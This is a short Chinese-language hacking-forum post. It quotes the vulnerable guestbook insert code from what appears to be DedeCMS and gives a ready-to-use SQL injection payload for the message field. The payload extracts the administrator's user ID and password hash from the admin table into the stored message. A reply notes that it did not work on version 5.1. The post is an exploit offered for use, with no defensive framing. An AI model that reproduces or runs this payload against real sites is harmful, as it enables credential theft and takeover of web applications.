You are not logged in.
欢迎cnryan同学加入狼族:-)
member_guestbook_action.php
$title = cn_substr(html2text($title),60);
$msg = cn_substr(stripslashes($msg),2048);
if($cfg_ml->M_UserName!="" && $cfg_ml->M_ID!=$uidnum) $gid = $cfg_ml->M_UserName;
else $gid = '';$inquery = "
INSERT INTO #@__member_guestbook(mid,gid,title,msg,uname,email,qq,tel,ip,dtime)
VALUES ('$uidnum','$gid','$title','$msg','$uname','$email','$qq','$tel','".GetIP()."',".mytime().");
";
一般的注射..
cn_substr在别处有别的错.这里无所谓了.
空间留言:
cccccc',(select concat(userid,0x3a,pwd) from #@__admin limit 0,1),'','','','123',123)#
Last edited by jackal (2010-03-04 02:17:01)
Offline
5.1测试的没有.
Offline